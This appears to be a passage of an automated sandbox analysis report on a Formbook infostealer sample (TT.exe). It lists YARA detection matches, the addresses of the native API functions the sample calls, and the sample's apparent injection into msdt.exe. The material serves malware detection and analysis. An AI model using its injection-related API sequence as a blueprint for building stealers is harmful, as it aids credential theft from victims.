          Source: 1.2.TT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TT.exe.3030000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TT.exe.3030000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.TT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.TT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.TT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TT.exe.3030000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TT.exe.3030000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00419D5A NtCreateFile,1_2_00419D5A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00419E0A NtReadFile,1_2_00419E0A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00419E8A NtClose,1_2_00419E8A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,1_2_00419F3A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A998F0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A99860
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99840 NtDelayExecution,LdrInitializeThunk,1_2_00A99840
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A999A0 NtCreateSection,LdrInitializeThunk,1_2_00A999A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A99910
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99A20 NtResumeThread,LdrInitializeThunk,1_2_00A99A20
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A99A00
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99A50 NtCreateFile,LdrInitializeThunk,1_2_00A99A50
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A995D0 NtClose,LdrInitializeThunk,1_2_00A995D0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99540 NtReadFile,LdrInitializeThunk,1_2_00A99540
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A996E0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A99660
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A997A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A99780
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A99710
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A998A0 NtWriteVirtualMemory,1_2_00A998A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99820 NtEnumerateKey,1_2_00A99820
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A9B040 NtSuspendThread,1_2_00A9B040
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A999D0 NtCreateProcessEx,1_2_00A999D0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99950 NtQueueApcThread,1_2_00A99950
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99A80 NtOpenDirectoryObject,1_2_00A99A80
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99A10 NtQuerySection,1_2_00A99A10
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A9A3B0 NtGetContextThread,1_2_00A9A3B0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99B00 NtSetValueKey,1_2_00A99B00
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A995F0 NtQueryInformationFile,1_2_00A995F0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99520 NtWaitForSingleObject,1_2_00A99520
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A9AD30 NtSetContextThread,1_2_00A9AD30
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99560 NtWriteFile,1_2_00A99560
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A996D0 NtCreateKey,1_2_00A996D0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99610 NtEnumerateValueKey,1_2_00A99610
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99670 NtQueryInformationProcess,1_2_00A99670
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99650 NtQueryValueKey,1_2_00A99650
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99FE0 NtCreateMutant,1_2_00A99FE0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99730 NtQueryVirtualMemory,1_2_00A99730
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A9A710 NtOpenProcessToken,1_2_00A9A710
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99760 NtOpenProcess,1_2_00A99760
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A99770 NtSetInformationFile,1_2_00A99770
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A9A770 NtOpenThread,1_2_00A9A770
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_00419D60 NtCreateFile,1_1_00419D60
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_00419E10 NtReadFile,1_1_00419E10
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_00419E90 NtClose,1_1_00419E90
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,1_1_00419F40
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_00419D5A NtCreateFile,1_1_00419D5A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49840 NtDelayExecution,LdrInitializeThunk,7_2_04D49840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04D49860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D495D0 NtClose,LdrInitializeThunk,7_2_04D495D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D499A0 NtCreateSection,LdrInitializeThunk,7_2_04D499A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49540 NtReadFile,LdrInitializeThunk,7_2_04D49540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04D49910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D496D0 NtCreateKey,LdrInitializeThunk,7_2_04D496D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D496E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04D496E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49650 NtQueryValueKey,LdrInitializeThunk,7_2_04D49650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49A50 NtCreateFile,LdrInitializeThunk,7_2_04D49A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04D49660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49FE0 NtCreateMutant,LdrInitializeThunk,7_2_04D49FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49780 NtMapViewOfSection,LdrInitializeThunk,7_2_04D49780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49710 NtQueryInformationToken,LdrInitializeThunk,7_2_04D49710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D498F0 NtReadVirtualMemory,7_2_04D498F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D498A0 NtWriteVirtualMemory,7_2_04D498A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D4B040 NtSuspendThread,7_2_04D4B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49820 NtEnumerateKey,7_2_04D49820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D499D0 NtCreateProcessEx,7_2_04D499D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D495F0 NtQueryInformationFile,7_2_04D495F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49950 NtQueueApcThread,7_2_04D49950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49560 NtWriteFile,7_2_04D49560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D4AD30 NtSetContextThread,7_2_04D4AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49520 NtWaitForSingleObject,7_2_04D49520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49A80 NtOpenDirectoryObject,7_2_04D49A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49670 NtQueryInformationProcess,7_2_04D49670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49610 NtEnumerateValueKey,7_2_04D49610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49A10 NtQuerySection,7_2_04D49A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49A00 NtProtectVirtualMemory,7_2_04D49A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49A20 NtResumeThread,7_2_04D49A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D4A3B0 NtGetContextThread,7_2_04D4A3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D497A0 NtUnmapViewOfSection,7_2_04D497A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49770 NtSetInformationFile,7_2_04D49770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D4A770 NtOpenThread,7_2_04D4A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49760 NtOpenProcess,7_2_04D49760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D4A710 NtOpenProcessToken,7_2_04D4A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49B00 NtSetValueKey,7_2_04D49B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D49730 NtQueryVirtualMemory,7_2_04D49730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007D9D60 NtCreateFile,7_2_007D9D60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007D9E10 NtReadFile,7_2_007D9E10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007D9E90 NtClose,7_2_007D9E90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007D9F40 NtAllocateVirtualMemory,7_2_007D9F40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007D9D5A NtCreateFile,7_2_007D9D5A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007D9E0A NtReadFile,7_2_007D9E0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007D9E8A NtClose,7_2_007D9E8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007D9F3A NtAllocateVirtualMemory,7_2_007D9F3A
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403461
          Source: C:\Users\user\Desktop\TT.exeCode function: 0_2_004069250_2_00406925
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041E1FC1_2_0041E1FC
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041D2601_2_0041D260
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041DA2A1_2_0041DA2A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041BDC41_2_0041BDC4
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00409E401_2_00409E40
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00409E3C1_2_00409E3C
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041D6DF1_2_0041D6DF
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_0041DFA31_2_0041DFA3
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A820A01_2_00A820A0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B220A81_2_00B220A8
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6B0901_2_00A6B090
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B228EC1_2_00B228EC
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B110021_2_00B11002
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A741201_2_00A74120
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A5F9001_2_00A5F900
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B222AE1_2_00B222AE
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A8EBB01_2_00A8EBB0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1DBD21_2_00B1DBD2
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B22B281_2_00B22B28
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6841F1_2_00A6841F
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B1D4661_2_00B1D466
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A825811_2_00A82581
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A6D5E01_2_00A6D5E0
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B225DD1_2_00B225DD
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A50D201_2_00A50D20
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B22D071_2_00B22D07
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B21D551_2_00B21D55
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B22EF71_2_00B22EF7
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00A76E301_2_00A76E30
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_2_00B21FF11_2_00B21FF1
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_0041E1FC1_1_0041E1FC
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_0041D2601_1_0041D260
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_0041DA2A1_1_0041DA2A
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_0041BDC41_1_0041BDC4
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_00402D901_1_00402D90
          Source: C:\Users\user\Desktop\TT.exeCode function: 1_1_00409E401_1_00409E40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD28EC7_2_04DD28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1B0907_2_04D1B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D320A07_2_04D320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD20A87_2_04DD20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCD4667_2_04DCD466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1841F7_2_04D1841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DC10027_2_04DC1002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD25DD7_2_04DD25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D1D5E07_2_04D1D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D325817_2_04D32581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD1D557_2_04DD1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D0F9007_2_04D0F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD2D077_2_04DD2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D00D207_2_04D00D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D241207_2_04D24120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD2EF77_2_04DD2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD22AE7_2_04DD22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D26E307_2_04D26E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DCDBD27_2_04DCDBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD1FF17_2_04DD1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04D3EBB07_2_04D3EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04DD2B287_2_04DD2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007DE1FC7_2_007DE1FC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007DBDC47_2_007DBDC4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007C2D907_2_007C2D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007C9E407_2_007C9E40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007C9E3C7_2_007C9E3C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007C2FB07_2_007C2FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_007DDFA37_2_007DDFA3
          Source: C:\Users\user\Desktop\TT.exeCode function: String function: 00A5B150 appears 35 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04D0B150 appears 35 times
          Source: TT.exe, 00000000.00000003.334832337.000000000333F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT.exe
          Source: TT.exe, 00000001.00000002.396335168.0000000002810000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs TT.exe
          Source: TT.exe, 00000001.00000002.393874457.0000000000B4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TT.exe
          Source: TT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.597321036.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.392835395.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.393512483.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.335739935.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.344692024.0000000003030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.597417500.0000000002F90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.392976261.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TT.exe.3030000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TT.exe.3030000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
